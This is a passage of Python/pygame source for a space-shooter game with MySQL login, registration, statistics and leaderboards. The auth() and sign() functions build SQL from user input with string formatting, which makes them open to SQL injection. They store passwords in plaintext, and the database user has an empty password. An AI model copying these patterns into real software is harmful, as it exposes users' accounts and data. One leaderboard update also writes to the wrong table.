HEIGHT))\npygame.display.set_caption(\"Apocalypse\")\nclock = pygame.time.Clock()\n# \n\n# \ncrash_sound = pygame.mixer.Sound(\"crash.wav\")\ncrash_sound.set_volume(0.08 * (0.01 * volume))\npygame.mixer.music.load(\"purpleheart.mp3\")\npygame.mixer.music.set_volume(0.2 * (0.01 * volume))\nlaser_sound = pygame.mixer.Sound(\"laser2.wav\")\nlaser_sound.set_volume(0.1 * (0.01 * volume))\npygame.mixer.music.play(-1)\nplayer_crashed = pygame.mixer.Sound(\"player_crash.wav\")\nplayer_crashed.set_volume(0.3 * (0.01 * volume))\n\n# \n\n# \nbackground = pygame.image.load(path.join(img_dir, \"starfield.png\")).convert()\nmenu_background = pygame.image.load(path.join(img_dir, \"71.jpg\")).convert()\nplayer_img = pygame.image.load(path.join(img_dir, \"playerShip1_blue.png\")).convert()\nplayer_img2 = pygame.image.load(path.join(img_dir, \"playerShip2_blue.png\")).convert()\nplayer_img3 = pygame.image.load(path.join(img_dir, \"playerShip3_blue.png\")).convert()\nmeteor_img = pygame.image.load(path.join(img_dir, \"meteorBrown_med1.png\")).convert()\nbullet_img = pygame.image.load(path.join(img_dir, \"laserRed16.png\")).convert()\ngame_over_img = pygame.image.load(path.join(img_dir, \"68.jpg\")).convert()\nabout_img = pygame.image.load(path.join(img_dir, \"about.png\")).convert()\nlock_img = pygame.image.load(path.join(img_dir, \"lock.png\")).convert()\n\npts_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"pts.png\")).convert(), (30, 30))\np2_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"silver2.png\")).convert(), (30, 30))\np3_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"bronze3.png\")).convert(), (30, 30))\np1_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"gold1.png\")).convert(), (30, 30))\npygame.transform.scale(lock_img, (50, 35))\nabout_img_rect = about_img.get_rect()\ngame_over_img_rect = game_over_img.get_rect()\nmenu_background_rect = menu_background.get_rect()\nbackground_rect = background.get_rect()\nexplosion_anim = {}\nexplosion_anim[\"lg\"] = []\nexplosion_anim[\"sm\"] = []\n\n\n# \n\n\ndef menu():\n global gear\n global about\n global dead\n global intro\n global pts\n global running\n global paused\n global authorization_procedure\n select_1 = False\n select_2 = False\n select_3 = False\n select_4 = False\n authorization_procedure = False\n intro = True\n first_select = False\n pts_img.set_colorkey(BLACK)\n while intro:\n\n screen.blit(menu_background, menu_background_rect)\n menu_text = mediumtext.render(\"Apocalypse\", True, LIGHT_BLUE)\n\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if 302 >= mouse[0] >= 180 and 200 >= mouse[1] >= 155:\n first_select = False\n select_1 = True\n select_2 = False\n select_3 = False\n select_4 = False\n elif first_select is False:\n select_1 = False\n\n if 380 >= mouse[0] >= 115 and 285 >= mouse[1] >= 245:\n first_select = False\n select_1 = False\n select_2 = True\n select_3 = False\n select_4 = False\n elif first_select is False:\n select_2 = False\n\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n first_select = False\n select_1 = False\n select_2 = False\n select_3 = True\n select_4 = False\n elif first_select is False:\n select_3 = False\n\n if 358 >= mouse[0] >= 128 and 547 >= mouse[1] >= 510:\n first_select = False\n select_1 = False\n select_2 = False\n select_4 = True\n select_3 = False\n elif first_select is False:\n select_4 = False\n\n if select_1 is False:\n Play = mediumtext.render(\"PLAY\", True, LIGHT_BLUE)\n screen.blit(Play, [180, 140])\n else:\n Play = mediumtext.render(\"PLAY\", True, BLUE)\n screen.blit(Play, [180, 140])\n\n if select_2 is False:\n gears = mediumtext.render(\"SETTINGS\", True, LIGHT_BLUE)\n screen.blit(gears, [110, 230])\n else:\n gears = mediumtext.render(\"SETTINGS\", True, BLUE)\n screen.blit(gears, [110, 230])\n\n if select_3 is False:\n quit = mediumtext.render(\"QUIT\", True, LIGHT_BLUE)\n screen.blit(quit, [170, 320])\n else:\n quit = mediumtext.render(\"QUIT\", True, BLUE)\n screen.blit(quit, [170, 320])\n\n if select_4 is False:\n stats_text = mediumtext.render(\"Statistics\", True, LIGHT_BLUE)\n screen.blit(stats_text, [125, 490])\n else:\n stats_text = mediumtext.render(\"Statistics\", True, BLUE)\n screen.blit(stats_text, [125, 490])\n\n screen.blit(menu_text, [110, 0])\n\n screen.blit(pts_img, [417, 150])\n\n if 447 >= mouse[0] >= 417 and 180 >= mouse[1] >= 150:\n pygame.draw.rect(screen, BLUE, ((411, 145), (41, 40)), 3)\n if click[0] == 1:\n ladders()\n else:\n pygame.draw.rect(screen, LIGHT_BLUE, ((411, 145), (41, 40)), 3)\n\n for event in pygame.event.get():\n # print(event)\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if select_1:\n intro = False\n inventory()\n\n elif select_3:\n quit()\n pygame.quit()\n else:\n intro = True\n running = False\n\n if select_4:\n player_statistics()\n\n if select_2:\n gear = True\n settings()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n if first_select:\n if select_1:\n select_1, select_2 = select_2, select_1\n elif select_2:\n select_2, select_3 = select_3, select_2\n elif select_3:\n select_3, select_4 = select_4, select_3\n elif select_4:\n select_4, select_1 = select_1, select_4\n\n if not first_select:\n select_1 = True\n first_select = True\n if event.key == pygame.K_RETURN:\n if select_1:\n intro = False\n inventory()\n\n elif select_2:\n gear = True\n settings()\n elif select_3:\n quit()\n pygame.quit()\n elif select_4:\n player_statistics()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef auth(name, password_field):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT login, user_password, nickname FROM players where login = ('{}') and\" \\\n \" user_password = ('{}')\".format(name, password_field)\n cursor.execute(query)\n row = cursor.fetchone()\n if row is not None:\n\n player.nickname = row[2]\n cnx.close()\n return True\n else:\n cnx.close()\n return False\n\n\ndef sign(nickname, name, password_field):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"INSERT INTO players(nickname, login, user_password) VALUES('{}', '{}', '{}')\".format(\n nickname, name, password_field)\n\n try:\n cursor.execute(query)\n except mysql.connector.errors.IntegrityError:\n return False\n queries = [\"INSERT INTO daily_current_ladder(user_nickname, user_max_daily_points) VALUES('{}', 0)\",\n \"INSERT INTO weekly_current_ladder(user_nickname, user_max_weekly_points) VALUES('{}', 0)\",\n \"INSERT INTO monthly_current_ladder(user_nickname, user_max_monthly_points) VALUES('{}', 0)\",\n \"INSERT INTO daily_past_ladder(user_nickname, user_past_daily_points) VALUES('{}', 0)\",\n \"INSERT INTO weekly_past_ladder(user_nickname, user_past_weekly_points) VALUES('{}', 0)\",\n \"INSERT INTO monthly_past_ladder(user_nickname, user_past_monthly_points) VALUES('{}', 0)\",\n \"INSERT INTO inventory(user_nickname, space_ship2, space_ship3) VALUES('{}', false, false)\",\n \"INSERT INTO statistics(user_nickname, max_points, total_points, games_played, max_daily_points, \"\n \"max_weekly_points, max_monthly_points) VALUES('{}', 0, 0, 0, 0, 0, 0)\"]\n for elem in queries:\n cursor.execute(elem.format(nickname))\n\n cnx.commit()\n cnx.close()\n return True\n\n\ndef update_stats(points):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"UPDATE statistics SET total_points = total_points + %s WHERE user_nickname = %s\"\n query2 = \"UPDATE statistics SET games_played = games_played + 1 WHERE user_nickname = %(nick)s\"\n query3 = \"SELECT max_points, max_daily_points, max_weekly_points, max_monthly_points FROM statistics WHERE \" \\\n \"user_nickname = %(nick)s\"\n\n params = {'nick': player.nickname}\n data2 = (points, player.nickname)\n cursor.execute(query, data2)\n cursor.execute(query2, params)\n cursor.execute(query3, params)\n row = cursor.fetchone()\n\n if row[0] < points:\n cursor.execute(\"UPDATE statistics SET max_points = %s WHERE user_nickname = %s\", data2)\n if points >= 1000:\n cursor.execute(\"UPDATE inventory SET space_ship3 = %s WHERE user_nickname = %s\", (1, player.nickname))\n elif points >= 350:\n cursor.execute(\"UPDATE inventory SET space_ship2 = %s WHERE user_nickname = %s\", (1, player.nickname))\n\n if row[1] < points:\n cursor.execute(\"UPDATE statistics SET max_daily_points = %s WHERE user_nickname = %s\", data2)\n cursor.execute(\"UPDATE daily_current_ladder SET user_max_daily_points = %s WHERE user_nickname = %s\", data2)\n if row[2] < points:\n cursor.execute(\"UPDATE statistics SET max_weekly_points = %s WHERE user_nickname = %s\", data2)\n cursor.execute(\"UPDATE weekly_current_ladder SET user_max_weekly_points = %s WHERE user_nickname = %s\", data2)\n if row[3] < points:\n cursor.execute(\"UPDATE statistics SET max_monthly_points = %s WHERE user_nickname = %s\", data2)\n cursor.execute(\"UPDATE weekly_current_ladder SET user_max_monthly_points = %s WHERE user_nickname = %s\", data2)\n\n cnx.commit()\n cnx.close()\n\n\ndef show_stats():\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT max_points, total_points, games_played, max_daily_points, max_weekly_points, max_monthly_points\" \\\n \" FROM statistics WHERE user_nickname = %(nick)s\"\n params = {'nick': player.nickname}\n cursor.execute(query, params)\n row = cursor.fetchone()\n cnx.close()\n return row\n\n\ndef authorization_window():\n latency = 0\n name = \"\"\n password_field = \"\"\n selection_1 = False\n selection_2 = False\n need_to_start = False\n need_to_quit = False\n start_latency = False\n wrong_data = False\n need_to_reg = False\n while authorization_procedure is True:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n authorization_text = mediumtext.render(\"Authorization\", True, WHITE)\n login_text = smalltext.render(\"Username\", True, WHITE)\n password_text = smalltext.render(\"Password\", True, WHITE)\n text_log_in = smalltext.render(\"Log in\", True, WHITE)\n text_cancel = smalltext.render(\"Cancel\", True, WHITE)\n text_sign_in = smalltext.render(\"Sign in\", True, WHITE)\n invalid_data = smalltext.render(\"Wrong password or login\", True, RED)\n screen.blit(authorization_text, (75, 0))\n screen.blit(login_text, (25, 143))\n screen.blit(password_text, (25, 215))\n\n username_text = smalltext.render(name, True, WHITE)\n password_field_text = smalltext.render(password_field, True, WHITE)\n hidden_password_text = smalltext.render(\"*\" * len(password_field), True, WHITE)\n\n screen.blit(username_text, (155, 143))\n screen.blit(hidden_password_text, (155, 212))\n\n pygame.draw.rect(screen, WHITE, (150, 143, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 215, 315, 38), 3)\n\n pygame.draw.rect(screen, WHITE, (50, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (53, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (225, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (228, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (355, 315, 100, 45), 3)\n\n if 465 > mouse[0] > 150 and 181 > mouse[1] > 143 and click[0] == 1:\n selection_1 = True\n selection_2 = False\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 + 73 and click[0] == 1:\n selection_2 = True\n selection_1 = False\n elif click[0] == 1:\n selection_1 = False\n selection_2 = False\n\n if 150 > mouse[0] > 50 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (52, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if auth(name, password_field) is True:\n need_to_start = True\n start_latency = True\n else:\n wrong_data = True\n elif 325 > mouse[0] > 225 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (227, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_quit = True\n elif 450 > mouse[0] > 360 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (357, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_reg = True\n screen.blit(text_log_in, (65, 315))\n screen.blit(text_cancel, (236, 316))\n screen.blit(text_sign_in, (365, 315))\n\n if wrong_data is True:\n screen.blit(invalid_data, (25, 260))\n\n if start_latency is True:\n latency += 1\n\n if latency == 7:\n latency = 0\n if need_to_start:\n menu()\n elif need_to_quit:\n pygame.quit()\n quit()\n elif need_to_reg:\n registration_window()\n\n if selection_1 is True:\n pygame.draw.rect(screen, GRAY_SELECTION, (147, 140, 321, 44), 3)\n if selection_2 is True:\n pygame.draw.rect(screen, GRAY_SELECTION, (147, 212, 321, 44), 3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n selection_2, selection_1 = selection_1, selection_2\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n name) < 15 and selection_1 is True:\n name += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_1 is True:\n name = name[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n password_field) < 15 and selection_2 is True:\n password_field += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_2 is True:\n password_field = password_field[:-1]\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef registration_window():\n latency = 0\n name = \"\"\n password_field = \"\"\n nickname = \"\"\n selection_3 = False\n selection_1 = False\n selection_2 = False\n need_to_quit = False\n start_latency = False\n need_to_reg = False\n wrong_data = False\n need_to_back = False\n while authorization_procedure is True:\n screen.fill(GRAY2)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n registration_text = mediumtext.render(\"Registration\", True, WHITE)\n nickname_text = smalltext.render(\"Nickname\", True, WHITE)\n login_text = smalltext.render(\"Username\", True, WHITE)\n password_text = smalltext.render(\"Password\", True, WHITE)\n text_sign_in = smalltext.render(\"Sign in\", True, WHITE)\n text_cancel = smalltext.render(\"Cancel\", True, WHITE)\n text_back = smalltext.render(\"Back\", True, WHITE)\n invalid_data = smalltext.render(\"This login has already been taken\", True, RED)\n screen.blit(registration_text, (102, -10))\n screen.blit(login_text, (25, 143))\n screen.blit(password_text, (25, 215))\n screen.blit(nickname_text, (25, 71))\n nickname_text_writeble = smalltext.render(nickname, True, WHITE)\n username_text = smalltext.render(name, True, WHITE)\n password_field_text = smalltext.render(password_field, True, WHITE)\n hidden_password_text = smalltext.render(\"*\" * len(password_field), True, WHITE)\n\n screen.blit(nickname_text_writeble, (155, 143 - (212 - 140)))\n screen.blit(username_text, (155, 143))\n screen.blit(hidden_password_text, (155, 212))\n\n pygame.draw.rect(screen, WHITE, (150, 143, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 215, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 71, 315, 38), 3)\n\n pygame.draw.rect(screen, WHITE, (50, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (53, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (225, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (228, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (355, 315, 100, 45), 3)\n\n if 465 > mouse[0] > 150 and 181 > mouse[1] > 143 and click[0] == 1:\n selection_1 = False\n selection_2 = True\n selection_3 = False\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 + 73 and click[0] == 1:\n selection_2 = False\n selection_1 = False\n selection_3 = True\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 - 73 and click[0] == 1:\n selection_2 = False\n selection_1 = True\n selection_3 = False\n elif click[0] == 1:\n selection_3 = False\n selection_1 = False\n selection_2 = False\n\n if 150 > mouse[0] > 50 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (52, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if sign(nickname, name, password_field) is True:\n need_to_reg = True\n start_latency = True\n else:\n wrong_data = True\n elif 325 > mouse[0] > 225 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (227, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_quit = True\n elif 450 > mouse[0] > 360 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (357, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_back = True\n screen.blit(text_sign_in, (60, 315))\n screen.blit(text_cancel, (236, 316))\n screen.blit(text_back, (375, 315))\n\n if wrong_data is True:\n screen.blit(invalid_data, (25, 260))\n\n if start_latency is True:\n latency += 1\n\n if latency == 7:\n latency = 0\n if need_to_reg:\n authorization_window()\n elif need_to_quit:\n pygame.quit()\n quit()\n elif need_to_back:\n authorization_window()\n\n if selection_1 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 68, 321, 44), 3)\n if selection_2 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 140, 321, 44), 3)\n if selection_3 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 212, 321, 44), 3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n if selection_1:\n selection_2, selection_1 = selection_1, selection_2\n elif selection_2:\n selection_3, selection_2 = selection_2, selection_3\n elif selection_3:\n selection_3, selection_1 = selection_1, selection_3\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n nickname) < 15 and selection_1 is True:\n nickname += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_1 is True:\n nickname = nickname[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n name) < 15 and selection_2 is True:\n name += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_2 is True:\n name = name[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n password_field) < 15 and selection_3 is True:\n password_field += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_3 is True:\n password_field = password_field[:-1]\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef died():\n global sx\n global sy\n global dead\n dead = True\n sy = 1\n sx = 3\n timer = 0\n while dead:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n screen.blit(game_over_img, game_over_img_rect)\n killed = largetext.render(\"YOU DIED\", True, RED)\n screen.blit(killed, [55, 100])\n pygame.display.update()\n clock.tick(15)\n timer += 1\n if timer == 45:\n menu()\n\n\ndef pause():\n global paused\n global running\n global gear\n running = False\n paused = True\n while paused:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if 344 >= mouse[0] >= 139 and 200 >= mouse[1] >= 155:\n play = mediumtext.render(\"RESUME\", True, BLUE)\n screen.blit(play, [136, 140])\n else:\n play = mediumtext.render(\"RESUME\", True, LIGHT_BLUE)\n screen.blit(play, [136, 140])\n\n if 380 >= mouse[0] >= 120 and 285 >= mouse[1] >= 245:\n gears = mediumtext.render(\"SETTINGS\", True, BLUE)\n screen.blit(gears, [110, 230])\n else:\n gears = mediumtext.render(\"SETTINGS\", True, LIGHT_BLUE)\n screen.blit(gears, [110, 230])\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n About = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(About, [170, 320])\n else:\n About = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(About, [170, 320])\n\n pause_text = mediumtext.render(\"Game is Paused\", True, YELLOW)\n screen.blit(pause_text, [65, 0])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n paused = False\n running = True\n\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 344 >= mouse[0] >= 139 and 200 >= mouse[1] >= 155:\n paused = False\n running = True\n\n if 380 >= mouse[0] >= 120 and 285 >= mouse[1] >= 245:\n settings()\n\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n paused = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef skin_check():\n global skin1\n global skin2\n global skin3\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT space_ship2, space_ship3 FROM inventory WHERE \" \\\n \"user_nickname = %(nick)s\"\n cursor.execute(query, {'nick': player.nickname})\n row = cursor.fetchone()\n if row[0] == 1:\n skin2 = True\n if row[1] == 1:\n skin3 = True\n skin1 = True\n\n\ndef ladders_check():\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n self_daily = \"SELECT max_daily_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_daily = \"SELECT user_past_daily_points FROM daily_past_ladder WHERE user_nickname = %(nick)s\"\n self_weekly = \"SELECT max_weekly_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_weekly = \"SELECT user_past_weekly_points FROM weekly_past_ladder WHERE user_nickname = %(nick)s\"\n self_monthly = \"SELECT max_monthly_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_monthly = \"SELECT user_past_monthly_points FROM monthly_past_ladder WHERE user_nickname = %(nick)s\"\n self_data = {'nick': player.nickname}\n max_daily = \"SELECT user_nickname, max_daily_points FROM statistics ORDER BY max_daily_points DESC LIMIT 5\"\n max_past_daily = \"SELECT user_nickname, user_past_daily_points FROM daily_past_ladder ORDER BY \" \\\n \"user_past_daily_points DESC LIMIT 5\"\n max_weekly = \"SELECT user_nickname, max_weekly_points FROM statistics ORDER BY max_weekly_points DESC LIMIT 5\"\n max_past_weekly = \"SELECT user_nickname, user_past_weekly_points FROM weekly_past_ladder ORDER BY \" \\\n \"user_past_weekly_points DESC LIMIT 5\"\n max_monthly = \"SELECT user_nickname, max_monthly_points FROM statistics ORDER BY max_monthly_points DESC LIMIT 5\"\n max_past_monthly = \"SELECT user_nickname, user_past_monthly_points FROM monthly_past_ladder ORDER BY \" \\\n \"user_past_monthly_points DESC LIMIT 5\"\n cursor.execute(self_daily, self_data)\n self_d = cursor.fetchone()\n cursor.execute(self_past_daily, self_data)\n self_pd = cursor.fetchone()\n\n cursor.execute(self_weekly, self_data)\n self_w = cursor.fetchone()\n cursor.execute(self_past_weekly, self_data)\n self_pw = cursor.fetchone()\n\n cursor.execute(self_monthly, self_data)\n self_m = cursor.fetchone()\n cursor.execute(self_past_monthly, self_data)\n self_pm = cursor.fetchone()\n\n cursor.execute(max_daily)\n top5_d = cursor.fetchall()\n cursor.execute(max_past_daily)\n top5past_d = cursor.fetchall()\n\n cursor.execute(max_weekly)\n top5_w = cursor.fetchall()\n cursor.execute(max_past_weekly)\n top5past_w = cursor.fetchall()\n\n cursor.execute(max_monthly)\n top5_m = cursor.fetchall()\n cursor.execute(max_past_monthly)\n top5past_m = cursor.fetchall()\n\n print(self_past_daily, self_past_weekly, self_past_monthly)\n cnx.close()\n return self_d, self_m, self_w, top5_d, top5_w, top5_m, self_pd, self_pw, self_pm, \\\n top5past_d, top5past_w, top5past_m\n\n\ndef inventory():\n global running\n global intro\n skin_choice = True\n skin_check()\n select1 = False\n select2 = False\n select3 = False\n select4 = False\n select5 = False\n global dead\n global pts\n global choiced_player_image\n while skin_choice:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n choose_text = mediumtext.render(\"Select the ship\", True, WHITE)\n start_text = mediumtext.render(\"Start\", True, WHITE)\n back_text = mediumtext.render(\"Back\", True, WHITE)\n\n player_img.set_colorkey(BLACK)\n screen.blit(player_img, (30, 50))\n\n if skin2:\n player_img2.set_colorkey(BLACK)\n screen.blit(player_img2, (190, 50))\n else:\n pygame.draw.rect(screen, BLACK, ((182, 40), (126, 100)))\n screen.blit(lock_img, (212, 55))\n if skin3:\n player_img3.set_colorkey(BLACK)\n screen.blit(player_img3, (350, 50))\n else:\n pygame.draw.rect(screen, BLACK, ((340, 40), (120, 100)))\n screen.blit(lock_img, (367, 55))\n\n pygame.draw.rect(screen, WHITE, ((20, 40), (120, 100)), 3)\n pygame.draw.rect(screen, WHITE, ((182, 40), (126, 100)), 3)\n pygame.draw.rect(screen, WHITE, ((340, 40), (120, 100)), 3)\n\n pygame.draw.rect(screen, WHITE, ((150, 250), (150, 70)), 3)\n pygame.draw.rect(screen, WHITE, ((150, 350), (150, 70)), 3)\n\n if 140 >= mouse[0] >= 20 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin1:\n select1 = True\n select2 = False\n select3 = False\n player.image = skin1\n elif 308 >= mouse[0] >= 182 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin2:\n select1 = False\n select2 = True\n select3 = False\n player.image = skin2\n elif 460 >= mouse[0] >= 340 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin3:\n select1 = False\n select2 = False\n select3 = True\n player.image = skin3\n elif click[0] == 1 and not select4:\n select1 = select2 = select3 = False\n\n if 297 >= mouse[0] >= 152 and 317 >= mouse[1] >= 252:\n select4 = True\n else:\n select4 = False\n\n if 297 >= mouse[0] >= 152 and 417 >= mouse[1] >= 353:\n select5 = True\n else:\n select5 = False\n\n if select1:\n pygame.draw.rect(screen, BLACK, ((17, 36), (126, 108)), 3)\n player.image = pygame.transform.scale(player_img, (50, 35))\n if select2:\n pygame.draw.rect(screen, BLACK, ((179, 36), (132, 108)), 3)\n player.image = pygame.transform.scale(player_img2, (50, 35))\n if select3:\n pygame.draw.rect(screen, BLACK, ((337, 36), (126, 108)), 3)\n player.image = pygame.transform.scale(player_img3, (50, 35))\n if select4:\n pygame.draw.rect(screen, GRAY_SELECTION, ((152, 252), (146, 66)))\n if select5:\n pygame.draw.rect(screen, GRAY_SELECTION, ((152, 352), (146, 66)))\n\n screen.blit(choose_text, [65, 150])\n screen.blit(start_text, [158, 245])\n screen.blit(back_text, [167, 345])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1 and select4 and (select1 or select2 or select3):\n for s in mobs.sprites():\n s.kill()\n for s in bullets.sprites():\n s.kill()\n for s in explosions.sprites():\n s.kill()\n player.rect.centerx = WIDTH // 2\n player.rect.bottom = HEIGHT - 10\n spawn()\n skin_choice = False\n dead = False\n pts = 0\n running = True\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1 and select5:\n skin_choice = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef ladders():\n looking_stats = True\n select1 = True\n select2 = False\n stats = ladders_check()\n self_md = stats[0]\n self_pmd = stats[6]\n self_mw = stats[1]\n self_pmw = stats[7]\n self_mm = stats[2]\n self_pmm = stats[8]\n top5_d = stats[3]\n top5_pd = stats[9]\n top5_w = stats[4]\n top5_pw = stats[10]\n top5_m = stats[5]\n top5_pm = stats[11]\n select3 = True\n select4 = False\n select5 = False\n global p1_img\n global p2_img\n global p3_img\n global pts_img\n p1_img.set_colorkey(BLACK)\n p2_img.set_colorkey(BLACK)\n p3_img.set_colorkey(BLACK)\n pts_img.set_colorkey(BLACK)\n while looking_stats:\n ladders_text = mediumtext.render(\"Ladders\", True, WHITE)\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n cl_text = smalltext.render(\"Current ladder\", True, WHITE)\n pl_text = smalltext.render(\"Past ladder\", True, WHITE)\n daily_text = smallmediumtext.render(\"Daily\", True, WHITE)\n weekly_text = smallmediumtext.render(\"Weekly\", True, WHITE)\n monthly_text = smallmediumtext.render(\"Monthly\", True, WHITE)\n self_nick_text = smalltext.render(str(player.nickname), True, WHITE)\n\n print(mouse)\n\n pygame.draw.rect(screen, WHITE, (10, 73, 225, 35), 2) # boxes of ladder_names\n pygame.draw.rect(screen, WHITE, (245, 73, 225, 35), 2)\n\n pygame.draw.rect(screen, WHITE, (10, 120, 146, 50), 2)\n pygame.draw.rect(screen, WHITE, (166, 120, 146, 50), 2)\n pygame.draw.rect(screen, WHITE, (322, 120, 146, 50), 2)\n\n pygame.draw.rect(screen, WHITE, (10, 185, 460, 40), 2) # top players of ladder\n pygame.draw.rect(screen, WHITE, (10, 255, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 310, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 365, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 420, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 475, 460, 40), 2)\n\n screen.blit(pts_img, (355, 190))\n screen.blit(pts_img, (355, 260))\n screen.blit(pts_img, (355, 316))\n screen.blit(pts_img, (355, 371))\n screen.blit(pts_img, (355, 425))\n screen.blit(pts_img, (355, 481))\n\n screen.blit(p1_img, (16, 261))\n screen.blit(p2_img, (16, 316))\n screen.blit(p3_img, (16, 371))\n\n if 316 >= mouse[0] >= 167 and 572 >= mouse[1] >= 534:\n menu_text = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(menu_text, [167, 515])\n 